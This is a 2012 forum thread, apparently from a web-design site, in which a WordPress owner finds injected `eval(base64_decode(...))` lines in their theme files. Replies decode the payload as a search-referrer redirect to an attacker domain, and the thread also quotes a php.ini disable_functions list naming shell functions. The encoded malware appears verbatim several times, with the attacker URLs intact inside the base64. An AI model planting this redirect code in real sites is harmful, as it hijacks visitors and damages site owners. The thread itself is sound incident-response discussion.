Grow your CSS skills. Land your dream job.

Somethings gone terribly wrong, what do I do?

  • # February 16, 2012 at 2:06 pm

    Heey,

    So have no idea what has happened but I just logged into to my server via Coda to make some changes to a WordPress theme and basically it looks like all the PHP files have changed, they all are like this:

    < ?php	 	eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9")); get_header(); ?>

    < ?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9")); if (have_posts()) : while (have_posts()) : the_post(); ?>

    ">

    That’s just a small amount from the single.php page. I’m guessing it has something to do with the encoding perhaps? I’ve have a look at the files through the WordPress admin and they are all the same, I did log into another FTP yesterday, could that have something to do with it, perhaps it changed the default encoding Coda used?

    The website is workign fine at the moment, thankfully but I’m really worried about it. What will happen when I need to make changes, can I change it back somehow?

    Any help is really, really appreciated…

    Thanks!

    Ash

    # February 16, 2012 at 2:16 pm

    Looks like you have been subject to an exploit

    try

    http://wordpress.org/extend/plugins/exploit-scanner/

    # February 16, 2012 at 2:50 pm

    This is why it is always good practice to keep recent back-ups of your WordPress websites if at all possible.

    # February 16, 2012 at 2:59 pm

    Yup, What that “base64_decode” means is that the javascript was encoded into base64. It’s very easy to decode. Create the file here on your desktop and you can paste in the code and have it decoded for you.

    Here is an example of the first line:

    DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9

    which equals:

    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
    $referer=$_SERVER;
    $uag=$_SERVER;
    if ($uag) {
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex.ru/yandsearch?(.*?)&lr=/",$referer) or preg_match ("/google.(.*?)/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: LINK REMOVED");
    exit();
    }
    }
    }
    }

    Basically it’s some code to redirect your traffic to their page I believe. Probably to farm ad revenue. The other lines are also basically the same thing.

    I would change all your passwords and google around for other ways to more secure your website.

    # February 16, 2012 at 3:18 pm

    In “Digging Into WordPress” by Chris Coyier, he goes over some tactics to make it a little more difficult for hackers to break into your website. Also, it’s a very good read for WordPress entrepreneurs.

    # February 16, 2012 at 7:41 pm

    Ah! Thanks for the help everyone, have managed to backup most the folders so will keep on going, and will definitly check out the digging into WordPress book…

    Gonna have to change every password now aren’t I?

    Ash

    # February 16, 2012 at 9:00 pm

    Ok, don’t know if this is something to worry about or not but this file is in my root folder and i’m not sure if it’s suppose to be or not, it’s called “php.ini” and it’s got the following in it:

    register_globals = off
    allow_url_fopen = off

    expose_php = Off
    max_input_time = 60
    variables_order = "EGPCS"
    extension_dir = ./
    upload_tmp_dir = /tmp
    precision = 12
    SMTP = relay-hosting.secureserver.net
    url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=,fieldset="


    ; Only uncomment zend optimizer lines if your application requires Zend Optimizer support

    ;[Zend]
    ;zend_optimizer.optimization_level=15
    ;zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.3.3
    ;zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3
    ;zend_extension=/usr/local/Zend/lib/Optimizer-3.3.3/ZendExtensionManager.so
    ;zend_extension_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3/ZendExtensionManager_TS.so


    ; -- Be very careful to not to disable a function which might be needed!
    ; -- Uncomment the following lines to increase the security of your PHP site.

    ;disable_functions = "highlight_file,ini_alter,ini_restore,openlog,passthru,
    ; phpinfo, exec, system, dl, fsockopen, set_time_limit,
    ; popen, proc_open, proc_nice,shell_exec,show_source,symlink"

    Is that part of the hack or something to do with my host/wordpress?

    Thanks again, this is a nightmare, eh!

    # February 17, 2012 at 12:10 am

    yeah, that should be there

    # March 5, 2012 at 5:37 pm

    Same situation happened with client he owns 30 sites on one CPanel and all the php files got infected from this base64 code and when I decoded this I found that its just exploit to get traffic on few of the sites…
    Only there is one way that download all files and clean them from this code and upload it again. Why these files infected is just a mystery . Still figuring out. Also read a good discussion board for this problem http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html?showComment=1330986257272#c6640785865930412418

    Searching for the security issue next to avoid such problem again. And if anybody found solution then please advise.

    Regards

    # March 5, 2012 at 5:39 pm

    Actual base64 code is this

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
    define( "WP_INSTALLING", true );

    and after decoding I found this:

    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm)
    {
    $referer=$_SERVER;
    $uag=$_SERVER;
    if ($uag)
    {
    if (stristr($referer,"yahoo") or
    stristr($referer,"bing") or
    stristr($referer,"rambler") or
    stristr($referer,"gogo") or
    stristr($referer,"live.com")or
    stristr($referer,"aport") or
    stristr($referer,"nigma") or
    stristr($referer,"webalta") or
    stristr($referer,"begun.ru") or
    stristr($referer,"stumbleupon.com") or
    stristr($referer,"bit.ly") or
    stristr($referer,"tinyurl.com") or
    preg_match("/yandex.ru/yandsearch?(.*?)
    &lr=/",$referer) or
    preg_match ("/google.(.*?)/url/",$referer) or
    stristr($referer,"myspace.com") or
    stristr($referer,"facebook.com") or
    stristr($referer,"aol.com"))
    {
    if (!stristr($referer,"cache") or
    !stristr($referer,"inurl"))
    {
    header("Location: http://froling(dot)bee(dot)pl/"); exit();
    }
    }
    }
    }

    Note: I changed the URL of header location in code so nobody can click it accidentaly. Thanks Karlpcrowley for pointing me this issue.
    Cleaning files one by one is really tedious work …

    # March 5, 2012 at 5:52 pm

    Hey @Kamran9868 and @noahgelman,
    Any chance you edit that post to remove or modify the link in the header at the bottom
    Don’t want anybody to accidentally click it :)

    # March 5, 2012 at 10:18 pm

    yeah sure … I just changed the URL … Well I’d been googling and I found this article very useful to find malicious code on a hacked server… its a script lookforbadguys which can help to find out infected files and code bugs.
    I hope this may help.

    # March 5, 2012 at 10:34 pm

    Got one more good article for this here http://www.she-geeks.com/tag/malicious-eval-base64-code/ also check http://sucuri.net/ they seems good to fix the issue.

    # March 6, 2012 at 3:35 am

    @karlpcrowley Removed the one from Noah’s post as well

Viewing 14 posts - 1 through 14 (of 14 total)

You must be logged in to reply to this topic.

*May or may not contain any actual "CSS" or "Tricks".